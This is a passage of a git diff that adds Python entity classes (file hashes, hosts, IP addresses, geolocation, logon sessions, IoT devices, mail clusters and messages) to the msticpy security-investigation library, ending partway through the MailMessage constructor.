+        # Sha256Ac (type System.String)
+        "Sha256Ac": None,
+        "FileHashes": (list, "FileHash"),
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
+
+    def _add_paths(self, full_path, file_name=None):
+        if "/" in full_path:
+            self.PathSeparator = "/"
+            self.OSFamily = OSFamily.Linux
+        else:
+            self.PathSeparator = "\\"
+            self.OSFamily = OSFamily.Windows
+
+        if file_name:
+            self.Name = file_name
+            self.Directory = full_path
+            self.FullPath = self.Directory + self.PathSeparator + self.Name
+        else:
+            self.FullPath = full_path
+            self.Name = full_path.split(self.PathSeparator)[-1]
+            self.Directory = full_path.split(self.PathSeparator)[:-1]
+
+    @property
+    def file_hash(self) -> Optional[str]:
+        """
+        Return the first defined file hash.
+
+        Returns
+        -------
+        Optional[str]
+            Returns first-defined file hash in order of
+            SHA256, SHA1, MD5, SHA256AC (authenticode)
+
+        """
+        if self.FileHashes:
+            alg_order = {
+                Algorithm.SHA256: 0,
+                Algorithm.SHA1: 1,
+                Algorithm.MD5: 2,
+                Algorithm.SHA256AC: 3,
+            }
+
+            return next(
+                iter(
+                    sorted(
+                        self.FileHashes,
+                        key=lambda f_hash: alg_order.get(f_hash.Algorithm, 10),
+                    )
+                )
+            ).Value
+
+        return self.Sha256 or self.Sha1 or self.Md5 or self.Sha256Ac
diff --git a/msticpy/datamodel/entities/file_hash.py b/msticpy/datamodel/entities/file_hash.py
new file mode 100644
index 000000000..ac3d63c66
--- /dev/null
+++ b/msticpy/datamodel/entities/file_hash.py
@@ -0,0 +1,91 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""FileHash Entity class."""
+from typing import Any, Mapping
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .entity_enums import Algorithm
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class FileHash(Entity):
+    """
+    File Hash class.
+
+    Attributes
+    ----------
+    Algorithm : Algorithm
+        FileHash Algorithm
+    Value : str
+        FileHash Value
+
+    """
+
+    ID_PROPERTIES = ["Value"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Algorithm: Algorithm = Algorithm.Unknown
+        self.Value: str = ""
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_event is not None:
+            self._create_from_event(src_event)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return f"{self.Algorithm}: {self.Value}"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.Value
+
+    def _create_from_event(self, src_event):
+        self.Algorithm = src_event["Algorithm"]
+        self.Value = src_event["HashValue"]
+
+    _entity_schema = {
+        # The hash algorithm (type System.String)
+        "Algorithm": "Algorithm",
+        # Value (type System.String)
+        "Value": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/geo_location.py b/msticpy/datamodel/entities/geo_location.py
new file mode 100644
index 000000000..666286491
--- /dev/null
+++ b/msticpy/datamodel/entities/geo_location.py
@@ -0,0 +1,108 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""GeoLocation Entity class."""
+from typing import Any, Mapping, Optional, Tuple
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import ContextObject, Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class GeoLocation(Entity, ContextObject):
+    """
+    GeoLocation class.
+
+    Attributes
+    ----------
+    CountryCode : str
+        GeoLocation CountryCode
+    CountryName : str
+        GeoLocation CountryName
+    State : str
+        GeoLocation State
+    City : str
+        GeoLocation City
+    Longitude : float
+        GeoLocation Longitude
+    Latitude : float
+        GeoLocation Latitude
+    Asn : str
+        GeoLocation Asn
+
+    """
+
+    ID_PROPERTIES = ["Longitude", "Latitude", "City", "State", "CountryCode"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.CountryCode: Optional[str] = None
+        self.CountryName: Optional[str] = None
+        self.State: Optional[str] = None
+        self.City: Optional[str] = None
+        self.Longitude: Optional[float] = None
+        self.Latitude: Optional[float] = None
+        self.Asn: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return f"{self.CountryCode}; {self.State}; {self.City}"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.CountryCode or self.__class__.__name__
+
+    @property
+    def coordinates(self) -> Tuple[float, float]:
+        """Return Latitude/Longitude as a tuple of floats."""
+        if self.Latitude and self.Longitude:
+            return self.Latitude, self.Longitude
+        return (0.0, 0.0)
+
+    _entity_schema = {
+        # str
+        "CountryCode": None,
+        # str
+        "CountryName": None,
+        # str
+        "State": None,
+        # str
+        "City": None,
+        # double?
+        "Longitude": None,
+        # double?
+        "Latitude": None,
+        # int
+        "Asn": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/graph_property.py b/msticpy/datamodel/entities/graph_property.py
new file mode 100644
index 000000000..854305388
--- /dev/null
+++ b/msticpy/datamodel/entities/graph_property.py
@@ -0,0 +1,66 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Entity graph property."""
+from typing import Union
+
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+# flake8: noqa: F821
+# "Entity" cannot be imported due to circular reference
+
+
+# Future - will replace entity graph creation with property factory
+def graph_property(
+    name: str, prop_type: Union[type, str], edge_name: str = None
+) -> property:
+    """Property factory for graph_property."""
+    storage_name = f"_{name}"
+    edge_attrs = {"name": edge_name or name}
+    prop_doc = f"Get, set or delete {name} property."
+    if not isinstance(prop_type, type) or not prop_type == "self":
+        raise TypeError(
+            f"{prop_type} is not resolvable.",
+            "'prop_type' must be a type of Entity or the string 'self'",
+        )
+
+    def prop_getter(self: "Entity") -> "Entity":  # type: ignore
+        """Return property value."""
+        return getattr(self, storage_name, None)
+
+    def prop_setter(self: "Entity", value: "Entity"):  # type: ignore
+        """Set property value and add graph edge."""
+        nonlocal prop_type
+        if prop_type == "self":
+            prop_type = self.__class__
+        if not isinstance(prop_type, type) or not isinstance(value, prop_type):
+            raise TypeError(
+                f"Cannot assign {type(value)} to property {name}.",
+                f"Property must be of type {prop_type}",
+            )
+        if hasattr(self, storage_name):
+            delattr(self, storage_name)
+            for edge in self.edges:
+                if edge.attrs.get("name") == name:
+                    self.edges.remove(edge)
+                    break
+
+        setattr(self, storage_name, value)
+        self.add_edge(target=value, edge_attrs=edge_attrs)
+
+    def prop_del(self):
+        """Property deleter."""
+        if not hasattr(self, storage_name):
+            return
+        for edge in self.edges:
+            if edge.attrs.get("name") == name:
+                self.edges.remove(edge)
+                break
+        delattr(self, storage_name)
+
+    return property(prop_getter, prop_setter, prop_del, prop_doc)
diff --git a/msticpy/datamodel/entities/host.py b/msticpy/datamodel/entities/host.py
new file mode 100644
index 000000000..0e3050030
--- /dev/null
+++ b/msticpy/datamodel/entities/host.py
@@ -0,0 +1,158 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Host Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .entity_enums import OSFamily
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+
+
+@export
+class Host(Entity):
+    """
+    Host Entity class.
+
+    Attributes
+    ----------
+    DnsDomain : str
+        Host DnsDomain
+    NTDomain : str
+        Host NTDomain
+    HostName : str
+        Host HostName
+    NetBiosName : str
+        Host NetBiosName
+    AzureID : str
+        Host AzureID
+    OMSAgentID : str
+        Host OMSAgentID
+    OSFamily : str
+        Host OSFamily
+    OSVersion : str
+        Host OSVersion
+    IsDomainJoined : bool
+        Host IsDomainJoined
+
+    """
+
+    ID_PROPERTIES = ["fqdn", "AzureID", "OMSAgentID"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.DnsDomain: Optional[str] = None
+        self.NTDomain: Optional[str] = None
+        self.HostName: Optional[str] = None
+        self.NetBiosName: Optional[str] = None
+        self.AzureID: Optional[str] = None
+        self.OMSAgentID: Optional[str] = None
+        self.OSFamily: OSFamily = OSFamily.Windows
+        self.OSVersion: Optional[str] = None
+        self.IsDomainJoined: bool = False
+
+        super().__init__(src_entity=src_entity, **kwargs)
+        self._computer = None
+        if src_event is not None:
+            self._create_from_event(src_event)
+
+    @property
+    def computer(self) -> Optional[str]:
+        """Return computer from source event."""
+        return self._computer if self._computer is not None else self.fqdn
+
+    @property
+    def fqdn(self) -> Optional[str]:
+        """Construct FQDN from host + dns."""
+        if self.DnsDomain:
+            return f"{self.HostName}.{self.DnsDomain}"
+        return self.HostName
+
+    @property
+    def FullName(self) -> Optional[str]:  # noqa: N802
+        """Return the full name of the host - either FQDN or Netbiosname."""
+        if self.DnsDomain:
+            return f"{self.HostName or self.NetBiosName}.{self.DnsDomain}"
+        if self.NTDomain:
+            return f"{self.HostName or self.NetBiosName}.{self.NTDomain}"
+        return self.HostName or self.NetBiosName
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return f"{self.fqdn} ({self.OSFamily})"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.HostName or self.__class__.__name__
+
+    def _create_from_event(self, src_event):
+        if "Computer" in src_event:
+            self._computer = src_event["Computer"]
+            if "." in src_event["Computer"]:
+                self.HostName = src_event["Computer"].split(".", 1)[0]
+                self.DnsDomain = src_event["Computer"].split(".", 1)[1]
+            else:
+                self.HostName = src_event["Computer"]
+        elif "HostName" in src_event:
+            self.HostName = src_event["HostName"]
+            if "DnsDomain" in src_event:
+                self.DnsDomain = src_event["DnsDomain"]
+        self.NetBiosName = self.HostName
+
+    _entity_schema = {
+        # DnsDomain (type System.String)
+        "DnsDomain": None,
+        # NTDomain (type System.String)
+        "NTDomain": None,
+        # HostName (type System.String)
+        "HostName": None,
+        # NetBiosName (type System.String)
+        "NetBiosName": None,
+        # AzureID (type System.String)
+        "AzureID": None,
+        # OMSAgentID (type System.String)
+        "OMSAgentID": None,
+        # OSFamily (type System.Nullable`1
+        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.OSFamily])
+        "OSFamily": "OSFamily",
+        # IsDomainJoined (type System.Nullable`1[System.Boolean])
+        "IsDomainJoined": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/host_logon_session.py b/msticpy/datamodel/entities/host_logon_session.py
new file mode 100644
index 000000000..fd1a2659d
--- /dev/null
+++ b/msticpy/datamodel/entities/host_logon_session.py
@@ -0,0 +1,117 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""HostLogonSession Entity class."""
+from datetime import datetime
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .account import Account
+from .host import Host
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class HostLogonSession(Entity):
+    """
+    HostLogonSession Entity class.
+
+    Attributes
+    ----------
+    Account : Account
+        HostLogonSession Account
+    StartTimeUtc : datetime
+        HostLogonSession StartTimeUtc
+    EndTimeUtc : datetime
+        HostLogonSession EndTimeUtc
+    Host : Host
+        HostLogonSession Host
+    SessionId : str
+        HostLogonSession SessionId
+
+    """
+
+    ID_PROPERTIES = ["Account", "Host", "SessionId"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+
+        """
+        self.Account: Optional[Account] = None
+        self.StartTimeUtc: datetime = datetime.min
+        self.EndTimeUtc: datetime = datetime.min
+        self.Host: Optional[Host] = None
+        self.SessionId: str = ""
+        super().__init__(src_entity=src_entity, **kwargs)
+
+        if src_event is not None:
+            if "TimeCreatedUtc" in src_event:
+                self.StartTimeUtc = src_event["TimeCreatedUtc"]
+            elif "TimeGenerated" in src_event:
+                self.StartTimeUtc = src_event["TimeGenerated"]
+            self.EndTimeUtc = self.StartTimeUtc
+            self.SessionId = (
+                src_event["TargetLogonId"] if "TargetLogonId" in src_event else None
+            )
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        if self.Host:
+            return f"{self.Host.HostName}: session: {self.SessionId}"
+        return self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        if self.Host:
+            return f"{self.Host.HostName}"
+        return self.__class__.__name__
+
+    _entity_schema = {
+        # Account
+        "Account": "Account",
+        # StartTimeUtc (type System.Nullable`1[System.DateTime])
+        "StartTimeUtc": None,
+        # EndTimeUtc (type System.Nullable`1[System.DateTime])
+        "EndTimeUtc": None,
+        # Host
+        "Host": "Host",
+        # SessionId (type System.String)
+        "SessionId": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/iot_device.py b/msticpy/datamodel/entities/iot_device.py
new file mode 100644
index 000000000..b6ecd253f
--- /dev/null
+++ b/msticpy/datamodel/entities/iot_device.py
@@ -0,0 +1,123 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""IoTDevice Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+
+
+@export
+class IoTDevice(Entity):
+    """
+    IoTDevice Entity class.
+
+    Attributes
+    ----------
+    IoTHub : str
+        IoTHub of the IoT device
+    DeviceId : str
+        DeviceId of the IoT device
+    DeviceName : str
+        DeviceName of the IoT device
+    IoTSecurityAgentId : str
+        IoTSecurityAgentId of the IoT device
+    DeviceType : str
+        DeviceType of the IoT device
+    Source : str
+        Source of the IoT device
+    SourceRef : str
+        SourceRef of the IoT device
+    Manufacturer : str
+        Manufacturer of the IoT device
+    Model : str
+        Model of the IoT device
+    OperatingSystem : str
+        OperatingSystem of the IoT device
+    IpAddress : str
+        IpAddress of the IoT device
+    MacAddress : str
+        MacAddress of the IoT device
+    Protocols : str
+        Protocols of the IoT device
+    SerialNumber : str
+        SerialNumber of the IoT device
+
+    """
+
+    ID_PROPERTIES = ["IoTHub", "DeviceId"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.IoTHub: Optional[str] = None
+        self.DeviceId: Optional[str] = None
+        self.DeviceName: Optional[str] = None
+        self.IoTSecurityAgentId: Optional[str] = None
+        self.DeviceType: Optional[str] = None
+        self.Source: Optional[str] = None
+        self.SourceRef: Optional[str] = None
+        self.Manufacturer: Optional[str] = None
+        self.Model: Optional[str] = None
+        self.OperatingSystem: Optional[str] = None
+        self.IpAddress: Optional[str] = None
+        self.MacAddress: Optional[str] = None
+        self.Protocols: Optional[str] = None
+        self.SerialNumber: Optional[str] = None
+
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self):
+        """Return Entity Description."""
+        return f"{self.DeviceName} - {self.DeviceId}" or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.DeviceName or self.__class__.__name__
+
+    _entity_schema = {
+        "IoTHub": None,
+        "DeviceId": None,
+        "DeviceName": None,
+        "IoTSecurityAgentId": None,
+        "DeviceType": None,
+        "Source": None,
+        "SourceRef": None,
+        "Manufacturer": None,
+        "Model": None,
+        "OperatingSystem": None,
+        "IpAddress": "IpAddress",
+        "MacAddress": None,
+        "Protocols": None,
+        "SerialNumber": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/ip_address.py b/msticpy/datamodel/entities/ip_address.py
new file mode 100644
index 000000000..fa099ea4d
--- /dev/null
+++ b/msticpy/datamodel/entities/ip_address.py
@@ -0,0 +1,119 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""IpAddress Entity class."""
+from ipaddress import IPv4Address, IPv6Address, ip_address
+from typing import Any, List, Mapping, Optional, Union
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .geo_location import GeoLocation
+from .threat_intelligence import Threatintelligence
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+
+
+@export
+class IpAddress(Entity):
+    """
+    IPAddress Entity class.
+
+    Attributes
+    ----------
+    Address : str
+        IpAddress Address
+    Location : GeoLocation
+        IpAddress Location
+    ThreatIntelligence : List[Threatintelligence]
+        IpAddress ThreatIntelligence
+
+    """
+
+    ID_PROPERTIES = ["Address"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Address: str = ""
+        self.Location: Optional[GeoLocation] = None
+        self.ThreatIntelligence: List[Threatintelligence] = []
+        super().__init__(src_entity=src_entity, **kwargs)
+
+        if src_event is not None and "Location" in src_event:
+            self.Location = GeoLocation(src_event["Location"])
+        if src_event is not None:
+            if "IpAddress" in src_event:
+                self.Address = src_event["IpAddress"]
+            elif "Address" in src_event:
+                self.Address = src_event["Address"]
+
+    @property
+    def ip_address(self) -> Union[IPv4Address, IPv6Address, None]:
+        """Return a python IP address object from the entity property."""
+        try:
+            return ip_address(self.Address)
+        except ValueError:
+            return None
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return (
+            f"{self.Address} - {self.Location.CountryCode}"
+            if self.Location
+            else self.Address
+        )
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.Address or self.__class__.__name__
+
+    _entity_schema = {
+        # Address (type System.String)
+        "Address": None,
+        # Location (type Microsoft.Azure.Security.Detection.AlertContracts
+        # .V3.ContextObjects.GeoLocation)
+        "Location": "GeoLocation",
+        # ThreatIntelligence (type System.Collections.Generic.List`1
+        # [Microsoft.Azure.Security.Detection.AlertContracts.V3
+        # .ContextObjects.ThreatIntelligence])
+        "ThreatIntelligence": (list, "Threatintelligence"),
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
+
+
+# Alias for IpAddress
+Ip = IpAddress
diff --git a/msticpy/datamodel/entities/mail_cluster.py b/msticpy/datamodel/entities/mail_cluster.py
new file mode 100644
index 000000000..df99f719b
--- /dev/null
+++ b/msticpy/datamodel/entities/mail_cluster.py
@@ -0,0 +1,147 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""MailCluster Entity class."""
+from typing import Any, Dict, List, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+
+
+@export
+class MailCluster(Entity):
+    """
+    MailCluster Entity class.
+
+    Attributes
+    ----------
+    NetworkMessageIds : List[str]
+        NetworkMessageIds of the Mail cluster
+    CountByDeliveryStatus : Dict[str, int] = {}
+        CountByDeliveryStatus of the Mail cluster
+    CountByThreatType : Dict[str, int] = {}
+        CountByThreatType of the Mail cluster
+    CountByProtectionStatus : Dict[str, int] = {}
+        CountByProtectionStatus of the Mail cluster
+    Threats : List[str]
+        Threats of the Mail cluster
+    Query : str
+        Query of the Mail cluster
+    QueryTime : datetime
+        QueryTime of the Mail cluster
+    MailCount : int
+        MailCount of the Mail cluster
+    IsVolumeAnomaly : bool
+        IsVolumeAnomaly of the Mail cluster
+    Source : str
+        Source of the Mail cluster
+    ClusterSourceIdentifier : str
+        ClusterSourceIdentifier of the Mail cluster
+    ClusterSourceType : str
+        ClusterSourceType of the Mail cluster
+    ClusterQueryStartTime : datetime
+        ClusterQueryStartTime of the Mail cluster
+    ClusterQueryEndTime : datetime
+        ClusterQueryEndTime of the Mail cluster
+    ClusterGroup : str
+        ClusterGroup of the Mail cluster
+
+    """
+
+    ID_PROPERTIES = ["Query", "Source"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.NetworkMessageIds: List[str] = []
+        self.CountByDeliveryStatus: Dict[str, int] = {}
+        self.CountByThreatType: Dict[str, int] = {}
+        self.CountByProtectionStatus: Dict[str, int] = {}
+        self.Threats: List[str] = []
+        self.Query: Optional[str] = None
+        self.QueryTime: Any = None
+        self.MailCount: int = 0
+        self.IsVolumeAnomaly: bool = False
+        self.Source: Optional[str] = None
+        self.ClusterSourceIdentifier: Optional[str] = None
+        self.ClusterSourceType: Optional[str] = None
+        self.ClusterQueryStartTime: Any = None
+        self.ClusterQueryEndTime: Any = None
+        self.ClusterGroup: Optional[str] = None
+
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_event is not None:
+            self._create_from_event(src_event)
+
+    def _create_from_event(self, src_event):
+        self.NetworkMessageIds = src_event["NetworkMessageIds"]
+        self.CountByThreatType = src_event["CountByThreatType"]
+        self.CountByProtectionStatus = src_event["CountByProtectionStatus"]
+        self.Query = src_event["Query"]
+        self.QueryTime = src_event["QueryTime"]
+        self.MailCount = src_event["MailCount"]
+        self.Source = src_event["Source"]
+
+    @property
+    def description_str(self):
+        """Return Entity Description."""
+        return self.Query or self.NetworkMessageIds or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        hash_val = hash(str(self.NetworkMessageIds))
+        return f"{self.__class__.__name__} - {hash_val}"
+
+    _entity_schema = {
+        "NetworkMessageIds": None,
+        "CountByDeliveryStatus": None,
+        "CountByThreatType": None,
+        "CountByProtectionStatus": None,
+        "Threats": None,
+        "Query": None,
+        "QueryTime": None,
+        "MailCount": None,
+        "IsVolumeAnomaly": None,
+        "Source": None,
+        "ClusterSourceIdentifier": None,
+        "ClusterSourceType": None,
+        "ClusterQueryStartTime": None,
+        "ClusterQueryEndTime": None,
+        "ClusterGroup": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/mail_message.py b/msticpy/datamodel/entities/mail_message.py
new file mode 100644
index 000000000..f9a4a190e
--- /dev/null
+++ b/msticpy/datamodel/entities/mail_message.py
@@ -0,0 +1,205 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""MailMessage Entity class."""
+from typing import Any, List, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+
+
+@export
+class MailMessage(Entity):
+    """
+    MailMessage Entity class.
+
+    Attributes
+    ----------
+    Recipient : str
+        Recipient of the Mail message
+    Files : List[Entity]
+        Files of the Mail message
+    Urls : List[str]
+        Urls of the Mail message
+    Threats : List[str]
+        Threats of the Mail message
+    Sender : str
+        Sender of the Mail message
+    P1Sender : str
+        P1Sender of the Mail message
+    P1SenderDisplayName : str
+        P1SenderDisplayName of the Mail message
+    P1SenderDomain : str
+        P1SenderDomain of the Mail message
+    SenderIP : str
+        SenderIP of the Mail message
+    P2Sender : str
+        P2Sender of the Mail message
+    P2SenderDisplayName : str
+        P2SenderDisplayName of the Mail message
+    P2SenderDomain : str
+        P2SenderDomain of the Mail message
+    ReceivedDate : datetime
+        ReceivedDate of the Mail message
+    NetworkMessageId : str
+        NetworkMessageId of the Mail message
+    InternetMessageId : str
+        InternetMessageId of the Mail message
+    Subject : str
+        Subject of the Mail message
+    BodyFingerprintBin1 : str
+        BodyFingerprintBin1 of the Mail message
+    BodyFingerprintBin2 : str
+        BodyFingerprintBin2 of the Mail message
+    BodyFingerprintBin3 : str
+        BodyFingerprintBin3 of the Mail message
+    BodyFingerprintBin4 : str
+        BodyFingerprintBin4 of the Mail message
+    BodyFingerprintBin5 : str
+        BodyFingerprintBin5 of the Mail message
+    AntispamDirection : str
+        AntispamDirection of the Mail message
+    DeliveryAction : str
+        DeliveryAction of the Mail message
+    DeliveryLocation : str
+        DeliveryLocation of the Mail message
+    Language : str
+        Language of the Mail message
+    ThreatDetectionMethods : str
+        ThreatDetectionMethods of the Mail message
+
+    """
+
+    ID_PROPERTIES = ["NetworkMessageId", "Recipient"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Recipient: Optional[str] = None
+        self.Files: List[Entity] = []
+        self.Urls: List[str] = []
+        self.Threats: List[str] = []
+        self.Sender: Optional[str] = None
+        self.P1Sender: Optional[str] = None
+        self.P1SenderDisplayName: Optional[str] = None
+        self.P1SenderDomain: Optional[str] = None
+        self.SenderIP: Optional[str] = None
+        self.P2Sender: Optional[str] = None
+        self.P2SenderDisplayName: Optional[str] = None
+        self.P2SenderDomain: Optional[str] = None
+        self.ReceivedDate: Any = None
+        self.NetworkMessageId: Optional[str] = None
+        self.InternetMessageId: Optional[str] = None
+        self.Subject: Optional[str] = None
+        self.BodyFingerprintBin1: Optional[str] = None
+        self.BodyFingerprintBin2: Optional[str] = None
+        self.BodyFingerprintBin3: Optional[str] = None
+        self.BodyFingerprintBin4: Optional[str] = None
+        self.BodyFingerprintBin5: Optional[str] = None
+        self.AntispamDirection: Optional[str] = None
+        self.DeliveryAction: Optional[str] = None
+        self.DeliveryLocation: Optional[str] = None
+        self.Language: Optional[str] = None
+        self.ThreatDetectionMethods: Optional[str] = None
+
